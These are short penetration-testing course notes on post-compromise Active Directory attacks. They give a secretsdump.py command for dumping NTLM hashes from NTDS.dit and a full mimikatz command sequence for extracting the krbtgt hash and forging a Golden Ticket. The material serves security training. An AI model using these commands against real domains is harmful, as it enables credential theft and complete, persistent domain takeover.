147 words
1 minutes
PEH notes - Active Directory 5

We’ve Compromised the Domain - Now What?#

Post-Domain Compromise Attack Strategy#


⚠️DUMP NTDS.dit to provide extra information for the client ⚠️

Dumping the NTDS.dit#

A database used to store AD Data:

  • User info
  • Group info
  • Security descriptors
  • Password hashes


  1. Run secretsdump.py

    secretsdump.py <domain_name>/<user>:'<password>'@<ip> -just-dc-ntlm  
  2. Crack those hashes!

Golden Ticket Attacks#


What is it?#

  • When we compromise the krbtgt account, we own the domain ⚠️
    • This account can grant TICKETS ‼️
  • We can request access to any resource or system of the domain
  • Golden tickets = complete access to every machine


  1. Run mimikatz

    mimikatz > privilege::debug
  2. Run the lsadump module

    mimikatz > lsadump::lsa /inject /name:krbtgt
  3. Write down the SID and the NTLM hash


  4. Pass-the-Ticket to have access to every machines in the domain in the current session

    # The <user> doesn't need to be real !!!!
    mimikatz > kerberos::golden /user:<user> /domain:<domain_name> /sid:<sid> /krbtgt:<ntml_hash> /id:<admin_id> /ptt

Because we have the control of krbtgt, we can now generate all the tickets to access to everything. That’s why we call this attack: Golden Ticket Attack

PEH notes - Active Directory 5
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